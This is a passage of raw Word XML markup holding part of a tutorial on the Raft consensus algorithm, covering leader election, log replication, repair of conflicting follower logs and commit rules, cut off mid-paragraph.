    <w:p w14:paraId="115E282D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>5. Each node votes (at most ONCE per term):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64380A02" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Grant vote IF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E4C964" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     - Candidate's term ≥ voter's current term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680ED2EC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     - Voter hasn't already voted in this term (or voted for this candidate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBEA085" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     - Candidate's log is at least as "up-to-date" as voter's log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20E0A9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">       (compare last entry's term, then length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3757A523" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="3866FF5D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>6. Candidate wins IF it receives votes from MAJORITY (including self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625F6FD8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Becomes LEADER.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0252A23D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Sends heartbeats to all followers (establishes authority).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3726BFCC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498D372" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>7. If no winner (split vote):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F4A131" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Election timeout expires again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8BA68" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → New election with higher term.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2973E6F3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Randomized timeouts reduce split-vote probability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6FB079" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Election timeout randomization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1F4A2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA2F384" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Each node picks a random election timeout: [150ms, 300ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58651B25" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="39CF2E96" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Why random? Prevents all nodes from starting elections simultaneously (split votes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3B09A8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Node A timeout: 200ms → starts election first → likely wins before others time out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEE51B7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Node B timeout: 280ms → sees A's RequestVote, votes for A, resets timer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C1B198" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Node C timeout: 320ms → same as B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C70570" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F285EC5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Result: Elections typically resolve in a single round.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC8978A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The "up-to-date" log check (critical for safety):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A5927" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EB2D12" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>When voting, a node only votes for candidates whose log is at least as up-to-date:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472CE7C7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="20C487C6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Compare (lastLogTerm, lastLogIndex):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E997F89" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  If candidate's lastLogTerm &gt; voter's lastLogTerm → candidate is more up-to-date ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE84FC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  If equal terms: candidate's lastLogIndex ≥ voter's → candidate is more up-to-date ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150085B3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Otherwise → reject vote.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5015E8D0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="739143A8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Why? This guarantees the elected leader has ALL committed entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD8AE7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Committed = replicated to majority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2697F6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Majority voted for new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA07C41" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Majority overlap → at least one voter has the committed entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB92D2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Leader's log is ≥ that voter's log → leader has it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECC4787" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 Log Replication — Detailed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE0B339" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steady-state operation (leader replicates to followers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40487FDA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385DA87C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>1. Client sends command to leader: "SET X = 5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C157229" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>2. Leader appends to its local log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC99C48" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Log: [..., (term=3, index=7, cmd="SET X=5")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D6D12" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="58CE0921" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>3. Leader sends AppendEntries to ALL followers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73411CAA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   AppendEntries(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F59242" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     term = 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF8A20E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     leaderId = A,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DAFC7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     prevLogIndex = 6,          ← index of entry before new ones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD4413" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     prevLogTerm = 3,           ← term of that entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C29847D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     entries = [(term=3, "SET X=5")],  ← new entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC855A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     leaderCommit = 6           ← leader's commit index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1424B4A6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F330DF5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="44AB5F0C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>4. Follower checks consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A308A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   IF follower has entry at index 6 with term 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD50E86" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     → Append new entries → reply SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B1634" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   ELSE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AF958B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     → reply FAILURE (log inconsistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08C85E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="07FB93F2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>5. On SUCCESS from MAJORITY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59675D90" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Leader advances commitIndex to 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D556C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Leader applies "SET X=5" to state machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42F097" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Leader responds to client: "Success!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F14C179" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Next heartbeat tells followers: leaderCommit=7 → they apply too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4F1918" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Handling log inconsistencies (after leader crashes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57829B43" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B489C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Follower's log may diverge from leader's after failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D5866" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="57E4FEB8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Leader log:  [1][1][1][2][3][3][3][3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070CC57E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Follower X:  [1][1][1][2][3][3]         ← missing entries (was offline)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100134CA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Follower Y:  [1][1][1][2][3][3][2][2]   ← extra uncommitted entries from old leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1952DDD6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="1B1513EA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t>Leader's fix for Follower X (missing entries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A9C231" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  AppendEntries(prevLogIndex=5, prevLogTerm=3, entries=[...]) → SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B7E89" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Follower appends missing entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382121B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="4FFD6276" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Leader's fix for Follower Y (conflicting entries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B71BBD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  AppendEntries(prevLogIndex=7, prevLogTerm=3) → FAILURE (term mismatch at index 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFF773" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Leader decrements nextIndex, retries: prevLogIndex=6 → FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB4F627" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Leader retries: prevLogIndex=5 → SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F542E48" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Follower DELETES entries after index 5 (the conflicting [2][2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B803A3A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Follower appends leader's entries from index 6 onwards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11469425" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE1772" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Leader's log ALWAYS wins. Followers ALWAYS converge to leader's log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C65F9C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Safety guarantee: Only COMMITTED entries are preserved. Uncommitted entries can be overwritten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154EAC6E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.6 Commit Rules (The Safety Guarantee)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639B9C0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F97C0A8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>An entry is COMMITTED when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6D8EE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  1. It's stored on a MAJORITY of nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067CEB85" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  2. The leader has replicated at least ONE entry from its OWN term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164049E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     that has been acknowledged by a majority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7511D6D2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="486B23AF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Why rule 2? The "Figure 8" problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5144DD72" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="59F03554" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Scenario without rule 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3ACC54" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Term 2 leader commits entry at index 3 (replicated to majority).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD932C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Term 2 leader crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3E51D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Term 3 leader is elected WITHOUT the entry at index 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7239531D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
